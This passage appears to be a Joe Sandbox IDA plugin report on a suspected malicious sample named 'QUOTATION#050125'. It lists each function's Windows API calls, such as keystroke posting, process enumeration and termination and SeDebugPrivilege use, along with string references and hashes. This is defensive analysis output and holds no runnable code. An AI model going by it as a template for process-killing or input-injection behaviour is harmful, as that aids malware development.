Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004E25DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 004E25E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004E2601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 004E2605
MapVirtualKeyW.USER32(00000025,00000000), ref: 004E260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004E2623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 004E2627

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 1d6db0566973f4bf06aee7b11b8138bbb048faf30ed670dcd4e83dcdf083ab90
Instruction ID: 5d31d5d35f6b45e4a56aeb24cbb73160ccfd38e4ec92a641317697432170cc35
Opcode Fuzzy Hash: 1d6db0566973f4bf06aee7b11b8138bbb048faf30ed670dcd4e83dcdf083ab90
Instruction Fuzzy Hash: 3401D8303D0354BBFB10676A9C8EF993F59DB5EB12F104016F318AF0D1C9E21444DA69

Function 004E1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,004E1449,?,?,00000000), ref: 004E180C
HeapAlloc.KERNEL32(00000000,?,004E1449,?,?,00000000), ref: 004E1813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004E1449,?,?,00000000), ref: 004E1828
GetCurrentProcess.KERNEL32(?,00000000,?,004E1449,?,?,00000000), ref: 004E1830
DuplicateHandle.KERNEL32(00000000,?,004E1449,?,?,00000000), ref: 004E1833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004E1449,?,?,00000000), ref: 004E1843
GetCurrentProcess.KERNEL32(004E1449,00000000,?,004E1449,?,?,00000000), ref: 004E184B
DuplicateHandle.KERNEL32(00000000,?,004E1449,?,?,00000000), ref: 004E184E
CreateThread.KERNEL32(00000000,00000000,004E1874,00000000,00000000,00000000), ref: 004E1868

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: a14ebe73db6a268f78a4e4b87fcdc475fd98512eecaaa07db6cc6984d1cd15fe
Instruction ID: 174f1fa9b167efe6ec12055c30541349e05151529259d136a0eace15267e4ec2
Opcode Fuzzy Hash: a14ebe73db6a268f78a4e4b87fcdc475fd98512eecaaa07db6cc6984d1cd15fe
Instruction Fuzzy Hash: 4C01BFB52C0344BFE710AB65DC4DF977F6CEB99B11F008411FA05DB1A1C6759804DB20

Function 0050A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 004ED4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 004ED501
Part of subcall function 004ED4DC: Process32FirstW.KERNEL32(00000000,?), ref: 004ED50F
Part of subcall function 004ED4DC: CloseHandle.KERNEL32(00000000), ref: 004ED5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0050A16D
GetLastError.KERNEL32 ref: 0050A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0050A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0050A268
GetLastError.KERNEL32(00000000), ref: 0050A273
CloseHandle.KERNEL32(00000000), ref: 0050A2C4

Strings

SeDebugPrivilege, xrefs: 0050A18F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 3555c54a45278612af82e29a643f3231aeb3ada05fbd24dfbdd25547295a1460
Instruction ID: 0f0da74611efdc722db5efc891bf02ebc82921ce3a4ac7248f237d9a68c9abff
Opcode Fuzzy Hash: 3555c54a45278612af82e29a643f3231aeb3ada05fbd24dfbdd25547295a1460
Instruction Fuzzy Hash: 6C617B34204342AFD720DF19C494F19BBA1BF54318F14889DE5668B6E3C776EC89CB96

Function 004EBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004EBCFD
IsMenu.USER32(00000000), ref: 004EBD1D
CreatePopupMenu.USER32 ref: 004EBD53
GetMenuItemCount.USER32(0179ACE8), ref: 004EBDA4
InsertMenuItemW.USER32(0179ACE8,?,00000001,00000030), ref: 004EBDCC

Strings

0, xrefs: 004EBCA8
2, xrefs: 004EBD37

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: b389ea4a4ae2a31db8e80179609f8baa3c1eec0cd1271195018d58410a236eae
Instruction ID: 7e71be105d21f4c6a62f8719c46b7dddd90fd366bc7ad511a2a6c73f2f74f8f0
Opcode Fuzzy Hash: b389ea4a4ae2a31db8e80179609f8baa3c1eec0cd1271195018d58410a236eae
Instruction Fuzzy Hash: 0F510E30A002899BDB21CFAACC84FEFBBF5EF45316F10815AE40197390D3789841CB99

Function 004EC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 004EC913

Strings

warning, xrefs: 004EC8FC
blank, xrefs: 004EC895
info, xrefs: 004EC8B4
stop, xrefs: 004EC8E4
question, xrefs: 004EC8CC

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 33e459f0f5604e23c9c65df8df3c4bdace5582950ff10cee8b12933437eedcc5
Instruction ID: 78085b287670bc038dd756bd2eb7274ade51e42bb57887acdbe5bde851a7408e
Opcode Fuzzy Hash: 33e459f0f5604e23c9c65df8df3c4bdace5582950ff10cee8b12933437eedcc5
Instruction Fuzzy Hash: 53112B71789346BAA7006B169CC2DEF2B9CEF6631AB10002FF500A6293D7BC5D02526D

Function 00519F86 Relevance: 12.3, APIs: 8, Instructions: 260windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00499BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00499BB2

GetSystemMetrics.USER32(0000000F), ref: 00519FC7
GetSystemMetrics.USER32(0000000F), ref: 00519FE7
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0051A224
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0051A242
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0051A263
ShowWindow.USER32(00000003,00000000), ref: 0051A282
InvalidateRect.USER32(?,00000000,00000001), ref: 0051A2A7
DefDlgProcW.USER32(?,00000005,?,?), ref: 0051A2CA

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 421d1fdbb4239881fb483606c3f0d95c317b39474cc8f22050b1c3a5385b6bb2
Instruction ID: c21d7c751caa56b41aa6b8652f9c641df2ace1b7dc2960ddd5705a49974a44e2
Opcode Fuzzy Hash: 421d1fdbb4239881fb483606c3f0d95c317b39474cc8f22050b1c3a5385b6bb2
Instruction Fuzzy Hash: 9DB1A735601215AFEF16CF68C9857EE3BF2BF88701F088069EC59AB295D731A980CB51

Function 0049F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,004D682C,00000004,00000000,00000000), ref: 0049F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,004D682C,00000004,00000000,00000000), ref: 004DF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,004D682C,00000004,00000000,00000000), ref: 004DF454

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 4e337280c55961e1d0c096530e18f2300891615f2d3d5982373cf03b26af1ad4
Instruction ID: 5ff44a3dba1b88fb011f521f88cd46de7682d748d14ccb86b077d0478713bb24
Opcode Fuzzy Hash: 4e337280c55961e1d0c096530e18f2300891615f2d3d5982373cf03b26af1ad4
Instruction Fuzzy Hash: 94412A71204640BACF389B2DC89876B7F92AB66314F14843FE447D2760C67EA88DDB19

Function 00512D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00512D1B
GetDC.USER32(00000000), ref: 00512D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00512D2E
ReleaseDC.USER32(00000000,00000000), ref: 00512D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00512D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00512D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00515A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00512DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00512DE1

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 0925669e7ccb803955bab68ff735960b736656199b4beddb6b13fa0390f2c09c
Instruction ID: 6172caa962dead108fcd87ec3430479d16392fcd5639d44057423afbfa9ebf01
Opcode Fuzzy Hash: 0925669e7ccb803955bab68ff735960b736656199b4beddb6b13fa0390f2c09c
Instruction Fuzzy Hash: 64318976241214BFEB218F54DC8AFEB3FA9FB19711F048055FE089A291C6769C91CBA4

Function 00504FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00505007
NULL Pointer assignment, xrefs: 0050502E, 00505383

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 04daaeda3cf79dbb6d9426909a094ee4587780f69badfe77a8eb5d7dc756a3c1
Instruction ID: 9134bbeec0ced38b93d3a129bb6d8883a00809a34c52b8f16ac712a8e6d0f666
Opcode Fuzzy Hash: 04daaeda3cf79dbb6d9426909a094ee4587780f69badfe77a8eb5d7dc756a3c1
Instruction Fuzzy Hash: E4D1CF75A0060AAFDF10CFA8C895BEEBBB5BF48344F148469E915AB281E770DD45CF90

Function 004B8D45 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 300COMMON

Download Yara Rule

Strings

.J, xrefs: 004B903A, 004B8FD0, 004B8FF2

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID: .J
API String ID: 0-1068496448
Opcode ID: 2af8bab8a7cf8b9ab668cc41ae7c497829289c0424d9ad5e3af8f36f20f02796
Instruction ID: 74bd3c76280fcbd8298c482ae70add5ed8886dbf458ed20bc1a88021df002289
Opcode Fuzzy Hash: 2af8bab8a7cf8b9ab668cc41ae7c497829289c0424d9ad5e3af8f36f20f02796
Instruction Fuzzy Hash: 6CC10375904249AFCF11EFA9D840BEEBBB4AF1A310F14409BE514A7392C7398D46CB79

Function 00504523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00504648
VariantInit.OLEAUT32(?), ref: 00504749
VariantClear.OLEAUT32(?), ref: 00504753
VariantClear.OLEAUT32(?), ref: 005047B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0050472C
Null Object assignment in FOR..IN loop, xrefs: 005045D8, 00504706, 005047BE

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: f50820b6695c4caf4e6b9f66cf78f5d44128ebd4984679749160cab6b975e26c
Instruction ID: af47ee1bbba457dfa719eaa94658e4451ec11602f778c8bd56291d0d318e6678
Opcode Fuzzy Hash: f50820b6695c4caf4e6b9f66cf78f5d44128ebd4984679749160cab6b975e26c
Instruction Fuzzy Hash: 6A918FB1A00219ABDF24CFA5C884FAEBFB8FF46714F108559F615AB281D7709945CFA0

Function 004F1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 004F125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 004F1284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 004F12A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004F12D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004F135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004F13C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 004F1430

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 1fa6787e649364fb0d07ecdd2317f1619c726d9dcec3f8c0ffffdce7e111059c
Instruction ID: d956275885078634ab601af84f612ddcf9c3647e09ade3100df1fcc0fa9aaff1
Opcode Fuzzy Hash: 1fa6787e649364fb0d07ecdd2317f1619c726d9dcec3f8c0ffffdce7e111059c
Instruction Fuzzy Hash: 4591E071A00218EFDB00DF95C884BBEB7B5FF44325F11406BEA10EB2A1D778A945CB99

Function 0049948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: be402194321ee8a597490de538448644c2aa28764618e71862f49079d18f70e1
Instruction ID: 0da6c1cccb120e482f36fd6686e4037e3190a4681b1be9b287cf5d36f74c032b
Opcode Fuzzy Hash: be402194321ee8a597490de538448644c2aa28764618e71862f49079d18f70e1
Instruction Fuzzy Hash: B1912771940219AFCF11CFA9C884AEEBFB8FF49320F14815AE515B7251D379AD42CB64

Function 00517E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(0179ADB0), ref: 00517F37
IsWindowEnabled.USER32(0179ADB0), ref: 00517F43
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0051801E
SendMessageW.USER32(0179ADB0,000000B0,?,?), ref: 00518051
IsDlgButtonChecked.USER32(?,?), ref: 00518089
GetWindowLongW.USER32(0179ADB0,000000EC), ref: 005180AB
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 005180C3

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 552588aff54b0928424bb7323d1d053887f92c3f5e6775292f2d161e4128130c
Instruction ID: aace315e826a862a07df1615b653fe4731286ea7f3bb52dd03686af6b3b3a307
Opcode Fuzzy Hash: 552588aff54b0928424bb7323d1d053887f92c3f5e6775292f2d161e4128130c
Instruction Fuzzy Hash: D7716874608248AFFB219F68C898FEBBFB9FF1D300F144459E95597261CB31A986DB10

Function 004EAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 004EAEF9
GetKeyboardState.USER32(?), ref: 004EAF0E
SetKeyboardState.USER32(?), ref: 004EAF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 004EAF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 004EAFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 004EAFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 004EB020

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 1c0142ccb9fcd78446db9f49d34dc8e1767786d5252617a5d1036603db46eaa2
Instruction ID: ab894d13fc981292e73b1a7fb69b3520325584a733e6e551b36f24b4db7dcd61
Opcode Fuzzy Hash: 1c0142ccb9fcd78446db9f49d34dc8e1767786d5252617a5d1036603db46eaa2
Instruction Fuzzy Hash: EF51D3A06047D53DFB36833A8845BBB7EE99B06305F08848BE1D5455C2C39DBCD8D799

Function 004EACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 004EAD19
GetKeyboardState.USER32(?), ref: 004EAD2E
SetKeyboardState.USER32(?), ref: 004EAD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 004EADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 004EADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 004EAE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 004EAE38

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: df9d591ed8df3a124d022701163441c5d5a07d35127e8d88220c8b8b7370ebbc
Instruction ID: abbdb04c326f7de88af84d9a1cccd92afd48669be06f2315bf7defb274b570a5
Opcode Fuzzy Hash: df9d591ed8df3a124d022701163441c5d5a07d35127e8d88220c8b8b7370ebbc
Instruction Fuzzy Hash: 545106A05447D13DFB32833A8C95BBB7E995F45302F08848AE1D5469C2C398FCA8D35A

Function 00513886 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00513925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0051393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00513954
SendMessageW.USER32(?,00001057,00000000,?), ref: 005139C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 005139F4

Strings

SysListView32, xrefs: 005138F7

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

